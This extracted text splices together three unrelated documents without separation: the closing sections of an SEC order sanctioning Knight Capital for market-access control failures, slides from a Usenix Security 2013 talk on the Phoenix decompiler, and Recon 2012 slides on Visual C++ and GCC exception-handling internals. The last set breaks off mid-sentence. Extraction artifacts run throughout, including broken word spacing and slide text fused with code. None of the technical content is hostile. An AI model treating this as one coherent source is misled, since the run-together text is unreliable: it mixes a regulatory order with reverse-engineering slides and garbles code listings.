monitoring tool , such as the risks posed by the lack of au tomated alerts and PMON’s inability to 
prevent the entry of orders that would exceed a capital threshold or position limit.  Further, 
Knight’s reviews did not adequately consider the root causes of previous incidents involving the 
entry of erroneous orders and the reasons why Knight’s controls failed to limit the harm from those incidents.  Knight reacted to the events narrowl y, limiting its responses to changes designed to 
prevent the exact problem at hand from recurring. 
45. Subsection (e)(2) of Rule 15c3- 5 requires that a broker or dealer’s C EO (or 
equivalent officer) certify on an annual basis that the firm’s risk management controls and supervisory procedures comply with paragraphs (b) and (c) of Rule 15c3 -5.  The certification 
signed by Knight’s CEO did not state that Knight’s controls and supervisory procedures complied with those provisions of the rule.  Rather, it stated th at Knight had in place “processes” to comply 
with the rule.  Certifying to the existence of processes is not equivalent to certifying that controls  
and procedures are reasonably  designed and comply with the rule.  Accordingly, Knight violated 
subsection (e )(2) of Rule 15c3- 5.   
B. 
Regulation SHO:  Rules 200(g) and 203(b)  
46. Rule 200(g) of Regulation SHO requires each broker or dealer to mark all sell 
orders of any equity security as “long ,” “short” or “short exempt.”  
47. Rule 203(b) of Regulation SHO states that a broker or dealer “may not accept a 
short sale order in an equity security from another person, or effect a short sale in an equity security for its own account, unless the broker or dealer has:  (i) [b] orrowed the security, or 
entered into a bona -fide arrangement to borrow the security; or (ii) [r] easonable grounds to believe 
that the security can be borrowed so that it can be delivered on the date delivery is due; and (iii) [d]ocumented  compliance with” these requirements.  
48. Knight violated Rules 200(g) and 203(b) of Regulation SHO on August 1, 2012, by 
mismark ing short sale orders as “long” and by failing to borrow, enter into a bona -fide 
arrangement to borrow, or have reasonable grounds to believe that the securities could be borrowed, so that they could be delivered on the date delivery was due, and failing to document compliance with this requirement, before effecting short sales.    
14 
 49. Based on the foregoing, the Commission finds that Kni ght willfully12 violated 
Section 15(c)(3) of the Exchange Act and Rule 15c3- 5 thereunder , and Rules 200(g) and 203(b) of 
Regulation SHO . 
REMEDIAL EFFORTS  
50. In determining to accept the Offer, the Commission considered remedial acts that 
Knight undertook and the cooperation that Knight afforded to the Commission staff  following the 
August 1 event . 
UNDERTAKINGS  
51. Respondent has undertaken to do the following : 
A. Retain at its  own  expense one or more qualified independent consultants 
(the “C onsultant ”) not unacceptable to the Commission staff to  conduct a 
comprehensive review of Respondent’s compliance with Exchange Act 
Rule 15c3- 5, including but not limited to : 
i. Respondent’s software development lifecycle processes for all of 
Knight’s business critica l systems and applications, including 
trading systems, finance, risk, and compliance;  and  
ii. Respondent’s risk management controls and supervisory 
procedures , including those pertaining to Respondent’s: (a) 
deployment of new software and code; (b) order rout ers; (c) 
firm-wide capital thresholds and the linkage, on an automated, 
pre-trade basis, of such thresholds to the entry of orders; and (d) 
incident response protocols . 
Such Consultant shall prepare a written report (the “Report”) that:  
iii. evaluates the adequ acy of Respondent’s software development 
lifecycle processes and its risk management controls and supervisory procedures to manage Respondent’s financial, 
regulatory, and other risks of market access; and  
iv. as may be needed, makes recommendations about how R espondent 
should modify or supplement its processes, controls, and procedures 
to manage its financial, regulatory, and other risks of market access.  
Respondent shall provide a copy of the engagement letter within fourteen (14) days of the date of this O rder detailing the Consultant’s responsibilities 
                                                 
12  A willful violation of the securities laws means merely “‘that the person charged with the duty knows 
what he is doing.’”  Wonsover v. SEC , 205 F.3d 408, 414 (D.C. Cir. 2000) (quoting Hughes v. SEC , 174 
F.2d 969, 977 (D.C. Cir. 1949)).  There is no requi rement that the actor “‘also be aware that he is violating 
one of the Rules or Acts.’”  Id. (quoting Gearhart & Otis, Inc. v. SEC , 348 F.2d 798, 803 (D.C. Cir. 1965)).  
15 
 to Commission staff.  
 
B. Cooperate fully with the Consultant, including providing the Consultant 
with access to Respondent’s files, books, records, and personnel (and 
Respondent’s affiliated entities’ files,  books, records, and personnel, in 
each case to the extent they relate to Respondent), as reasonably requested 
for the above -mentioned reviews, and obtaining the cooperation of 
respective employees or other persons under Respondent’s control.  
Respondent s hall require the Consultant to report to Commission staff on its 
activities as the staff may request.  
C. Permit the Consultant to engage such assistance, clerical, legal, or expert, as 
necessary and at a reasonable cost, to carry out its activities, and th e cost, if 
any, of such assistance shall be borne exclusively by Respondent.  
D. Require the Consultant within thirty ( 30) days of being retained, unless 
otherwise extended by Commission staff for good cause, to provide 
Respondent and Commission staff with an estimate of the time needed to complete the review and prepare the Report and provide a proposed deadline for the Report, subject to the approval of Commission staff. 
E. Require the Consultant to issue the Report by the approved deadline and provide the Repor t simultaneously to both Commission staff and 
Respondent. 
F. Submit to Commission staff and the Consultant, within thirty (30) days of 
the Consultant’s issuance of the Report, the date by which Respondent will adopt and implement any recommendations in the Re port, subject to 
Sections F (1)-(3) below and subject to the approval of Commission staff. 
(1) As to any recommendation that Respondent considers to be, in whole or in part, unduly burdensome or impractical, Respondent may submit in writing to the Consultan t and Commission staff a 
proposed alternative reasonably designed to accomplish the same objectives, within sixty (60) days of receiving the Report.  Respondent shall then attempt in good faith to reach an agreement with the Consultant relating to each dis puted recommendation and 
request that the Consultant reasonably evaluate any alternative proposed by Respondent.  If, upon evaluating Respondent’s proposal, the Consultant determines that the suggested alternative is reasonably designed to accomplish the s ame objectives as the 
recommendations in question, then the Consultant shall approve the suggested alternative and make the recommendations.  If the Consultant determines that the suggested alternative is not reasonably designed to accomplish the same obje ctives, the 
Consultant shall reject Respondent’s proposal.  The Consultant shall inform Respondent of the Consultant’s final determination 
16 
 concerning any recommendation that Respondent considers to be 
unduly burdensome or impractical within fourteen (14) days after 
the conclusion of the discussion and evaluation by Respondent and 
the Consultant. 
(2) In the event that Respondent and the Consultant are unable to agree 
on an alternative proposal, Respondent shall accept the Consultant’s recommendations.   
(3) Within thirty (30) days after final agreement is reached on any 
disputed recommendation, Respondent shall submit to the 
Consultant and Commission staff the date by which Respondent will adopt and implement the agreed -upon recommendation, subject 
to the approval of Commission staff. 
G. Adopt and implement, on the timetable set forth by Respondent in 
accordance with Item F , the recommendations in the Report.  Respondent 
shall notify the Consultant and Commission staff when the recommendations have been implement ed. 
H. Require the Consultant to certify, in writing, to Respondent and Commission staff, that Respondent has implemented the agreed- upon 
recommendations for which the Consultant was responsible and that Knight’s risk management controls and supervisory procedures are reasonably designed to manage the financial, regulatory, and other risks of 
market access.  The Consultant’s certification shall be received within sixty (60) days after Respondent has notified the Consultant that the recommendations have been implemented.  
I. Within one hundred and eighty (180) days from the date of the applicable certification described in paragraph H  above, require the Consultant to have 
completed a review of Knight’s revised product development processes and risk management c ontrols and supervisory procedures and submit a final 
written report (“Final Report”) to Respondent and Commission staff.  The Final Report shall describe the review made of Knight’s revised processes, controls, and procedures, and describe how Knight is i mplementing, 
enforcing, and auditing the enforcement and implementation of those processes, controls, and procedures.  The Final Report shall include an opinion of the Consultant as to whether the revised processes, controls, and procedures and their imple mentation and enforcement by Respondent and 
Respondent’s auditing of the implementation and enforcement of those processes, controls, and procedures are reasonably designed to manage the financial, regulatory, and other risks of market access. 
J. To ensure the independence of the Consultant, Respondent shall not have the authority to terminate the Consultant without prior written approval of Commission staff and shall compensate the Consultant and persons 
17 
 engaged to assist the Consultant for services rendered pursuant to this Order 
at their reasonable and customary rates.  
K. Require the Consultant to enter into an agreement that provides for the 
period of engagement and for a period of two years from the completion of 
the engagement, that the Consultant shall not enter into any employment, consultant, attorney -client, auditing, or other professional relationship with 
Respondent , or any of its present or former affiliates, directors, officers, 
employees, or agents acting in their capacity.  The agreement will also 
provide that the Consultant will require that any firm with which he/she/ it is 
affiliated or of which he/she/ it is a member, and any person engaged to 
assist the Consultant in performance of his/her/ its duties under this Order 
shall not, without prior writt en consent of Commission staff , enter into any 
employment, consultant, attorney -client, auditing or other professional 
relationship with Respondent , or any of its present or former affiliates, 
directors, officers, employees, or agents acting in their capacity as such for 
the period of the engagement and for a period of two years after the engagement.  
L. Respondent may apply to Commission staff for an extension of the deadlines described above before their expiration and, upon a showing of good cause by Re spondent, Commission staff may, in its sole discretion, 
grant such extensions for whatever time period it deems appropriate.  
M. Certification of Compliance by Respondent:  Respondent shall certify, in 
writing, compliance with the undertakings set forth above.  The certification shall identify the undertakings, provide written evidence of compliance in the form of a narrative, and be supported by exhibits sufficient to demonstrate compliance.  The Commission staff may make reasonable requests for further eviden ce of compliance, and Respondent 
agrees to provide such evidence.  The certification and supporting material shall be submitted to Robert A. Cohen, Assistant Director, Market Abuse Unit, Division of Enforcement, with a copy to the Office of Chief Counsel of the Enforcement Division, no later than sixty (60) days from the date of the completion of the undertakings.  
IV. 
In view of the foregoing, the Commission deems it necessary and appropriate in the public 
interest , and for the protection of investors , to impose the sanctions agreed to in Respondent ’s 
Offer.  
Accordingly, pursuant to Sections 15(b) and 21C of the Exchange Act, it is hereby 
ORDERED that:  
18 
 A. Respondent Knight cease and desist from committing or causing any violations and 
any future violations of S ection 15(c)(3) of the Exchange Act and Rule 15c3- 5 thereunder, and 
Rules 200(g) and 203(b) of Regulation SHO. 
B. Respondent Knight is censured.  
C. Pursuant to Section 21B(a) (1) and (2) of the Exchange Act, Respondent Knight 
shall, within ten (10) days of the entry of this Order, pay a civil money penalty in the amount of 
$12,000,000 ($ 12 million ) to the United States Treasury.  If timely payment is not made, 
additional interest shall accrue pursuant to 31 U.S.C. § 3717.  Such payment must be made in one of the f ollowing ways:  (1) Respondent Knight may transmit payment electronically to the 
Commission, which will provide detailed ACH transfer/Fedwire instructions upon request; (2) 
Respondent may make direct payment from  a bank account via Pay.gov through the SEC website 
at http://www.sec.gov/about/offices/ofm.htm
; or (3) Respondent Knight may pay by certified 
check, bank cashier’s check, or United States postal money order made payable to the Securities and Exchange Commission and hand- delivered or mailed to: 
Enterprise Services Center  
Accounts Receivable Branch  
HQ Bldg., Room 181, AMZ -341 
6500 South MacArthur Boulevard  
Oklahoma City, OK  73169 
Payments by check or money order must be accompanied by a cover letter identifying Knight as a 
Respondent in these proceedings and the file number of these proceedings; a copy of the cover letter and check or money order must be sent to Daniel M. Hawke, Chief, Market Abuse Unit, Division of Enforcement, Securities and Exchange Commission, The Mellon Independence Center, 701 Market Street, Philadelphia, PA  19106- 1532. 
D. Respondent Knight  shall comply with the Undertakings enumerated above.  
 
By the Commission.  
        Elizabeth M. Murphy  
       Secretary  
  Native x86 Decompilation Using 
Semantics -Preserving Structural Analysis 
and Iterative Control -Flow Structuring
Edward J. Schwartz*, JongHyup Lee✝, 
Maverick Woo*, and David Brumley*
Carnegie Mellon University*
Korea National University of Transportation✝
Which would you rather analyze?
8/15/13 Usenix Security 2013 2push%ebp
mov%esp,%ebp
sub$0x10,%esp
movl$0x1,-0x4(%ebp)
jmp1d<f+0x1d>
mov-0x4(%ebp),%eax
imul0x8(%ebp),%eax
mov%eax,-0x4(%ebp)
subl$0x1,0x8(%ebp)
cmpl$0x1,0x8(%ebp)
jgf<f+0xf>
mov-0x4(%ebp),%eax
leave
retintf(intc) {
intaccum=1;
for(; c >1; c--) {
accum=accum*c;
}
returnaccum;
}Functions
VariablesTypes
Control
Flow
8/15/13 3int f (int x) {
int y = 1;
while (x > y) {
y++;
}
return y;
010100101010101
001010110111010
101001010101010
101111100010100
010101101001010
100010010101101
010101011010111Original
Sourceint f (int a) {
int v = 1;
while (a > v++) 
{}
return v;
Recovered
Source
Compiled
Binary
Decompilers for Software Security
•Manual reverse -engineering
–Traditional decompiler application
•Apply wealth of existing source -code 
techniques to compiled programs [Chang06]
–Find bugs, vulnerabilities
•Heard at Usenix Security 2013, during 
Dowsing for Overflows
–“We need source code to access the high -level 
control flow structure and types”
8/15/13 Usenix Security 2013 4
Desired Properties for Security
1.Effective abstraction recovery
–Abstractions improve comprehension
8/15/13 Usenix Security 2013 5
Effective Abstraction Recovery
8/15/13 Usenix Security 2013 6s1;
while(e1) {
if(e2) { break; }
s2;
}
s3;
More
Abstracts1;
L1: if(e1) { gotoL2; }     
else{ gotoL4; }
L2: if(e2) { gotoL4; }
L3:s2; gotoL1;
L4:s3;
Less 
Abstract
Desired Properties for Security
1.Effective abstraction recovery
–Abstractions improve comprehension
2.Correctness
–Buggy(Decompiled) Buggy(Original)
8/15/13 Usenix Security 2013 7
Correctness
8/15/13 8010100101010101
001010110111010
101001010101010
101111100010100
010101101001010
100010010101101
010101011010111
Compiled
Binary
int f (int x) {
int y = 1;
while (x > y) {
y++;
}
return y;
Original
Sourceint f (int a) {
int v = 1;
while (a > v++) 
{}
return v;
Recovered
Source
Are these two programs 
semantically equivalent?
Prior Work on Decompilation
•Over 60 years of decompilation research
•Emphasis on manual reverse engineering
–Readability metrics
•Compression ratio: 1−LOCdecompiled
LOCassembly
•Smaller is better
•Little emphasis on other applications
–Correctness is rarely explicitly tested
8/15/13 Usenix Security 2013 9
The Phoenix C Decompiler
8/15/13 Usenix Security 2013 10
How to build a better decompiler?
•Recover missing abstractions one at a time
–Semantics preserving abstraction recovery
•Rewrite program to use abstraction
•Don’t change behavior of program 
•Similar to compiler optimization passes
8/15/13 Usenix Security 2013 11
Semantics Preservation
8/15/13 Usenix Security 2013 12s1;
while(e1) {
if(e2) { break; }
s2;
}
s3;s1;
L1: if(e1) { gotoL2; }     
else{ gotoL4; }
L2: if(e2) { gotoL4; }
L3:s2; gotoL1;
L4:s3;Abstraction
Recovery
Are these two programs 
semantically equivalent?
How to build a better decompiler?
•Recover missing abstractions one at a time
–Semantics preserving abstraction recovery
•Rewrite program to use abstraction
•Don’t change behavior of program 
•Similar to compiler optimization passes
•Challenge: building semantics preserving 
recovery algorithms
–This talk
•Focus on control flow structuring
•Empirical demonstration
8/15/13 Usenix Security 2013 13
Phoenix Overview
8/15/13 Usenix Security 2013 14010100101010101
001010110111010
101001010101010
101111100010100
010101101001010
100010010101101
010101011010111CFG RecoveryType
Recovery
Control
Flow
StructuringSource -code 
Outputint f (int x) {
int y = 1;
while (x > y) {
y++;
}
return y;
New in Phoenix
Control Flow Graph Recovery
8/15/13 Usenix Security 2013 15010100101010101
001010110111010
101001010101010
101111100010100
010101101001010
100010010101101
010101011010111
•Vertex represents straight -line binary code
•Edges represents possible control -flow transitions
•Challenge: Where does jmp %eax go?
•Phoenix uses Value Set Analysis [Balakrishnan10]CFG Recovery
e ¬e
Type Inference on Executables (TIE) [Lee11]
8/15/13 Usenix Security 2013 16movl(%eax), %ebx
•Constraint 1: %eax is a pointer to 
type <a>
•Constraint 2: %ebx has type <a>
•Solve all constraints to find <a>How does each instruction constrain the types?
Control Flow Structuring
8/15/13 Usenix Security 2013 17
Compilation
¬e eControl Flow Structuring
if(e)
{...;} 
else
{...;}
8/15/13 Usenix Security 2013 18
if(e)
{...;} 
else
{...;}
¬e eControl Flow 
Structuring
Control Flow Structuring:
Don’t Reinvent the Wheel
•Existing algorithms
–Interval analysis [Allen70]
•Identifies intervals or regions
–Structural analysis [Sharir80]
•Classifies regions into more specific types
•Both have been used in decompilers
•Phoenix based on structural analysis
8/15/13 Usenix Security 2013 19
Structural Analysis
•Iteratively match patterns to CFG
–Collapse matching regions
•Returns a skeleton :    while (e) { if (e’) {...} }
8/15/13 Usenix Security 2013 20
B2
if-then -else
B3
B1
B2
B1
while
Structural Analysis Example
8/15/13 Usenix Security 2013 21
WHILE
SEQ
ITE
1
 SEQ
1
...;
while(...) { if(...) {...} else{...} };
...; ...;
Structural Analysis Property Checklist
1.Effective abstraction recovery
8/15/13 Usenix Security 2013 22
Structural Analysis Property Checklist
1.Effective abstraction recovery
–Grace less failures for unstructured programs
•break , continue , and goto statements
•Failures cascade to large subgraphs
8/15/13 Usenix Security 2013 23
Unrecovered Structure
8/15/13 Usenix Security 2013 24
This break edge 
prevents progress
UNKNOWN
SEQs1;
while(e1) {
if(e2) { break; }
s2;
}
s3;s1;
L1: if(e1) { gotoL2; }     
else{ gotoL4; }
L2: if(e2) { gotoL4; }
L3:s2; gotoL1;
L4:s3;
Original Decompiled
Fix: New structuring 
algorithm featuring
Iterative Refinement
Iterative Refinement
•Remove edges that are preventing a match
–Represent in decompiled source as break , goto , 
continue
•Allows structuring algorithm to make more 
progress
8/15/13 Usenix Security 2013 25
Iterative Refinement
8/15/13 Usenix Security 2013 26s1;
while(e1) {
if(e2) { break; }
s2;
}
s3;s1;
while(e1) {
if(e2) { break; }
s2;
}
s3;
Original Decompiled
BREAK
SEQ
1
WHILE
SEQ
Structural Analysis Property Checklist
1.Effective abstraction recovery
–Grace less failures for unstructured programs
•break , continue , and goto s
•Failures cascade to large subgraphs
2.Correctness
8/15/13 Usenix Security 2013 27
Structural Analysis Property Checklist
1.Effective abstraction recovery
–Grace less failures for unstructured programs
•break , continue , and goto s
•Failures cascade to large subgraphs
2.Correctness
–Not originally intended for decompilation
–Structure can be incorrect for decompilation
8/15/13 Usenix Security 2013 28
Natural Loop Correctness Problem
8/15/13 Usenix Security 2013 29
x=1 y=2x≠1y≠2
NATURAL
LOOP
y=2 x=1
while(true) {
s1; if(x==1) gotoL2;
if(y==2) gotoL1;
}Non -determinism
Fix: Ensure patterns are
Semantics Preserving
Semantics Preservation
•Applies inside of control flow structuring too
8/15/13 Usenix Security 2013 30
x=1 y=2x≠1y≠2
NATURAL
LOOP
y=2 x=1

Phoenix Implementation and 
Evaluation
8/15/13 Usenix Security 2013 31
Readability: Phoenix Output
8/15/13 Usenix Security 2013 32intf(void) {
inta =42;
intb =0;
while(a) {
if(b) {
puts("c");
break;
} else{
puts("d");
}
a--;
b++;
}
puts ("e");
return0;
}t_reg32 f(void) {
t_reg32 v20 =42;
t_reg32 v24;
for(v24 =0; v20 !=0;
v24 =v24 +1) {
if(v24 !=0) {
puts ("c");
break;
}
puts ("d");
v20 =v20 -1;
}
puts ("e");
return0;
}
Original Decompiled
Large Scale Experiment Details
•Decompilers tested
–Phoenix
–Hex-Rays (industry state of the art)
–Boomerang (academic state of the art)
•Boomerang
•Did not terminate in <1 hour for most programs
•GNU coreutils 8.17, compiled with gcc
–Programs of varying complexity
–Test suite
8/15/13 Usenix Security 2013 33
Metrics (end -to-end decompiler)
1.Effective abstraction recovery
–Control flow structuring
2.Correctness
8/15/13 Usenix Security 2013 34
Control Flow Structure:
Gotos Emitted (Fewer Better)
8/15/13 Usenix Security 2013 35
4051
Phoenix Hex-Rays
Control Flow Structure:
Gotos Emitted (Fewer is Better )
8/15/13 Usenix Security 2013 36
401229
51
Phoenix Phoenix (orig. structural
analysis)Hex-Rays
Ideal: Correctness
8/15/13 37010100101010101
001010110111010
101001010101010
101111100010100
010101101001010
100010010101101
010101011010111
Compiled
Binaryint f (int x) {
int y = 1;
while (x > y) {
y++;
}
return y;int f (int a) {
int v = 1;
while (a > v++) 
{}
return v;
Original
SourceRecovered
Source
Are these two programs 
semantically equivalent?
Scalable: Testing
8/15/13 38010100101010101
001010110111010
101001010101010
101111100010100
010101101001010
100010010101101
010101011010111
Compiled
Binaryint f (int x) {
int y = 1;
while (x > y) {
y++;
}
return y;int f (int a) {
int v = 1;
while (a > v++) 
{}
return v;
Original
SourceRecovered
Source
Passes tests
 Passes tests
Is the decompiled 
program consistent with 
test requirements?
Number of Correct Utilities
8/15/13 Usenix Security 2013 39
2860
46
020406080100120
Hex-Rays Phoenix Phoenix (orig. structural
analysis)
All Utilities107
Correctness
•All known correctness errors attributed 
to type recovery
–No known problems in control flow structuring
•Rare issues in TIE revealed by Phoenix 
stress testing
–Even one type error can cause incorrectness
–Undiscovered variables
–Overly general type information
8/15/13 Usenix Security 2013 40
Conclusion
•Phoenix decompiler
–Ultimate goal: Correct, abstract decompilation
–Control -flow structuring algorithm
•Iterative refinement
•Semantics preserving schemas
•End -to-end correctness and abstraction recovery experiments on 
>100 programs
–Phoenix
•Control flow structuring: 
•Correctness: 50% 
•Correct, abstract decompilation of real programs is within reach
–This paper: improving control flow structuring
–Next direction: improved static type recovery
8/15/13 Usenix Security 2013 41
Thanks! 
•Questions?
Edward J. Schwartz
edmcman@cmu.edu
http://www.ece.cmu.edu/~ejschwar
8/15/13 Usenix Security 2013 42
ENDCompiler Internals: Exceptions and RTTI
Igor Skochinsky
Hex-RaysRecon 2012
Montreal
2(c) 2012 Igor SkochinskyOutlineOutline
Visual C++
Structured Exception Handling (SEH)
C++ Exception Handling (EH)
GCC
RTTI
SjLj exceptions
Zero-cost (table based)
3(c) 2012 Igor SkochinskyVisual C++
SEH vs C++ EH
SEH (Structured Exceptions Handling) is the low-level, 
system layer
Allows to handle exceptions sent by the kernel or raised 
by user code
C++ exceptions in MSVC are implemented on top of SEH
4(c) 2012 Igor SkochinskyVisual C++
Keywords __try, __except and __finally can be used for 
compiler-level SEH support
The compiler uses a single exception handler per all 
functions with SEH, but different supporting structures 
(scope tables) per function
The SEH handler registration frame is placed on the stack
In addition to fields required by system (handler address 
and next pointer), a few VC-specific fields are added
5(c) 2012 Igor SkochinskyVisual C++
Frame structure (fs:0 points to the Next member)
// -8 DWORD _esp;
// -4 PEXCEPTION_POINTERS xpointers;
struct _EH3_EXCEPTION_REGISTRATION
{
  struct _EH3_EXCEPTION_REGISTRATION *Next;
  PVOID ExceptionHandler;
  PSCOPETABLE_ENTRY ScopeTable;
  DWORD TryLevel;
};
6(c) 2012 Igor SkochinskyVisual C++
ExceptionHandler points to __except_handler3 (SEH3) or 
__except_handler4 (SEH4)
The frame set-up is often delegated to compiler helper 
(__SEH_prolog/__SEH_prolog4/etc)
ScopeTable  points to a table of entries describing all 
__try blocks in the function
in SEH4, the scope table pointer is XORed with the 
security cookie, to mitigate scope table pointer overwrite
7(c) 2012 Igor SkochinskyVisual C++: Scope Table
One scope table entry is generated per __try block
EnclosingLevel points to the block which contains the 
current one (first table entry is number 0)
Top level (function) is -1 for SEH3 and -2 for SEH4
SEH4 has additional fields for cookie checks
SEH3 SEH4
struct _SCOPETABLE_ENTRY 
{
  DWORD EnclosingLevel;
  void* FilterFunc;
  void* HandlerFunc;
}struct _EH4_SCOPETABLE {
DWORD GSCookieOffset;
DWORD GSCookieXOROffset;
DWORD EHCookieOffset;
DWORD EHCookieXOROffset;
_EH4_SCOPETABLE_RECORD ScopeRecord[];
};
8(c) 2012 Igor SkochinskyVisual C++: mapping tables to code
FilterFunc  points to the exception filter (expression in the 
__except operator)
HandlerFunc  points to the __except block body
if FilterFunc  is NULL, HandlerFunc  is the __finally block 
body
Current try block number is kept in the TryLevel  variable 
of the exception registration frame
 ; Entering __try block 0
 mov     [ebp+ms_exc.registration.TryLevel], 0
 ; Entering __try block 1
 mov     [ebp+ms_exc.registration.TryLevel], 1
 [...]
 ; Entering __try block 0 again
 mov     [ebp+ms_exc.registration.TryLevel], 0
9(c) 2012 Igor SkochinskyVisual C++: SEH helper functions
A few intrinsics are available for use in exception filters 
and __finally block
They retrieve information about the current exception
GetExceptionInformation/GetExceptionCode use the 
xpointers  variable filled in by the exception handler
AbnormalTermination() uses a temporary variable which is 
set before entering the __try block and cleared if the 
__finally handler is called during normal execution of the 
function
10(c) 2012 Igor SkochinskyC++ implementationVisual C++
11(c) 2012 Igor SkochinskyVisual C++: RTTI
See openrce.org for more info

12(c) 2012 Igor SkochinskyVisual C++: EH
EH is present if function uses try/catch statements or 
automatic objects with non-trivial destructors are present
implemented on top of SEH
Uses a distinct handler per function, but they all eventually 
call a common one 
(_CxxFrameHandler/_CxxFrameHandler3)
compiler-generated unwind funclets are used to perform 
unwinding actions (calling destructors etc) during exception 
processing
A special structure (FuncInfo) is generated for the function 
and contains info about unwinding actions and try/catch 
blocks
13(c) 2012 Igor SkochinskyVisual C++ EH: Registration and FuncInfo structure
typedef const struct _s_FuncInfo {
  unsigned int magicNumber:29;
  unsigned int bbtFlags:3;
  int maxState;
  const struct _s_UnwindMapEntry * pUnwindMap;
  unsigned int nTryBlocks;
  const struct _s_TryBlockMapEntry * pTryBlockMap;
  unsigned int nIPMapEntries;
  void * pIPtoStateMap;
  const struct _s_ESTypeList * pESTypeList;
  int EHFlags;
} FuncInfo;struct EHRegistrationNode {
 // -4 void *_esp;
 EHRegistrationNode *pNext;
 void *frameHandler;
 int state;
};
14(c) 2012 Igor SkochinskyVisual C++ EH: FuncInfo structure
Field Meaning
magicNumber 0x19930520: original (pre-VC2005?)
0x19930521: pESTypeList is valid
0x19930522: EHFlags is valid
maxState/pUnwindMap Number of entries and pointer to unwind map 
nTryBlocks/pTryBlockM
apNumber of entries and pointer to try{} block map
nIPMapEntries
pIPtoStateMapIP-to-state map (unused on x86)
pESTypeList List of exceptions in the throw specification 
(undocumented feature)
EHFlags FI_EHS_FLAG=1: function was compiled /EHs
15(c) 2012 Igor SkochinskyVisual C++ EH: Unwind map
typedef const struct _s_UnwindMapEntry {
  int toState;
  void *action;
} UnwindMapEntry;
Similar to SEH's scope table, but without exception filters
All necessary actions (unwind funclets) are executed 
unconditionally
Action can be NULL to indicate no-action state transition
Typical funclet destroys a constructed object on the stack, 
but there may be other variations
Top-level state is -1
16(c) 2012 Igor SkochinskyVisual C++: changes for x64
SEH changes completely
Instead of stack-based frame registration, pointers to 
handlers and unwind info are stored in .pdata section
Only limited set of instructions are supposed to be used in 
prolog and epilog, which makes stack walking and 
unwinding easier
"Language-specific handlers" are used to implement 
compiler-level SEH and C++ EH
However, the supporting SEH/EH structures (scope table, 
FuncInfo etc) are very similar
17(c) 2012 Igor Skochinskyx64: .pdata section
Contains an array of RUNTIME_FUNCTION structures
Each structure describes a contiguous range of 
instructions belonging to a function
Chained entries (bit 0 set in UnwindInfo) point to the 
parent entry
All addresses are RVAs
typedef struct _RUNTIME_FUNCTION {
  DWORD BeginAddress;
  DWORD EndAddress;
  DWORD UnwindInfoAddress;
} RUNTIME_FUNCTION;
18(c) 2012 Igor Skochinskyx64: Unwind Info
Starts with a header, then a number of "unwind codes", then an 
optional handler and any additional data for it
Handler is present if Flags have UNW_FLAG_EHANDLER or 
UNW_FLAG_UHANDLER
typedef struct _UNWIND_INFO {
    unsigned char Version : 3;                 // Version Number
    unsigned char Flags   : 5;                 // Flags
    unsigned char SizeOfProlog;
    unsigned char CountOfCodes;
    unsigned FrameRegister : 4;
    unsigned FrameOffset   : 4;
    UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&~1)-1];
 *  union {
 *      OPTIONAL ULONG ExceptionHandler;
 *      OPTIONAL ULONG FunctionEntry;
 *  };
 *  OPTIONAL ULONG ExceptionData[];
 */
} UNWIND_INFO, *PUNWIND_INFO;
19(c) 2012 Igor Skochinskyx64: Standard VC Exception Handlers
Handler Data
__C_specific_handler Scope table
__GSHandlerCheck GS data
__GSHandlerCheck_SEH Scope table + GS data
__CxxFrameHandler3 RVA to FuncInfo
__GSHandlerCheck_EH RVA to FuncInfo + GS data
struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct
    {
        DWORD BeginAddress;
        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
};struct _GS_HANDLER_DATA {
  union {
    union  {
      unsigned long EHandler:1;
      unsigned long UHandler:1;
      unsigned long HasAlignment:1;
    } Bits;
    int CookieOffset;
  } u;
  long AlignedBaseOffset;
  long Alignment;
};
20(c) 2012 Igor Skochinskyx64: Visual C++ SEH
Scope table entries are looked up from the PC (RIP) value 
instead of using an explicit state variable
Since they're sorted by address, this is relatively quick
Handler points to the exception filter and Target to the 
__except block body
However, if Target is 0, then Handler is the __finally block body
Compiler (always?) emits a separate function for __finally 
blocks and an inline copy in the function body
GS cookie data, if present, is placed after the scope table
21(c) 2012 Igor Skochinskyx64: VC C++ EH FuncInfo
typedef struct _s_FuncInfo
{
  int magicNumber;            // 0x19930522
  int maxState;               // number of states in unwind map
  int dispUnwindMap;          // RVA of the unwind map
  unsigned int nTryBlocks;    // count of try blocks
  int dispTryBlockMap;        // RVA of the try block array 
  unsigned int nIPMapEntries; // count of IP-to-state entries
  int dispIPtoStateMap;       // RVA of the IP-to-state array
  int dispUwindHelp;          // rsp offset of the state var
                    // (initialized to -2; used during unwinding)
  int dispESTypeList;         // list of exception spec types
  int EHFlags;                // flags
} FuncInfo;
Pretty much the same as x86, except RVAs instead of 
addresses and IP-to-state map is used
22(c) 2012 Igor Skochinskyx64: IP-to-state map
typedef struct IptoStateMapEntry {
  __int32     Ip; // Image relative offset of IP
  __ehstate_t State;
} IptoStateMapEntry;
              
Instead of an explicit state variable on the stack (as in x86), this 
map is used to find out the current state from the execution 
address
23(c) 2012 Igor Skochinskyx64: C++ Exception Record
typedef struct EHExceptionRecord {
  DWORD       ExceptionCode; // (= EH_EXCEPTION_NUMBER)
  DWORD       ExceptionFlags;  Flags determined by NT
  struct _EXCEPTION_RECORD *ExceptionRecord; // extra  record (not used)
  void *      ExceptionAddress;       // Address at which exception occurred
  DWORD       NumberParameters;       // Number of extended parameters. (=4)
  struct EHParameters {
      DWORD       magicNumber;        // = EH_MAGIC_NUMBER1
      void *      pExceptionObject;   // Pointer to the actual object thrown
      ThrowInfo   *pThrowInfo;        // Description of thrown object
      void        *pThrowImageBase;   // Image base of thrown object
      } params;
} EHExceptionRecord;
Since exceptions can be caught in a different module and the 
ThrowInfo RVAs might need to be resolved, the imagebase of 
the throw originator is added to the structure
24(c) 2012 Igor SkochinskyVisual C++: references
SEH
http://uninformed.org/index.cgi?v=4&a=1
http://www.nynaeve.net/?p=99
C++ EH/RTTI
http://www.codeproject.com/Articles/2126/How-a-C-compiler-
implements-exception-handling
http://www.openrce.org/articles/full_view/21
Wine sources
Visual Studio 2012 RC includes sources of the EH 
implementation
see VC\src\crt\ehdata.h and  VC\src\crt\eh\
includes parts of "ARMNT" and WinRT
25(c) 2012 Igor SkochinskyGCC
C++ in GCC
26(c) 2012 Igor SkochinskyGCC: Virtual Table Layout
In the most common case (no virtual inheritance), the 
virtual table starts with two entries: offset-to-base and 
RTTI pointer. Then the function pointers follow
In the virtual table for the base class itself, the offset will 
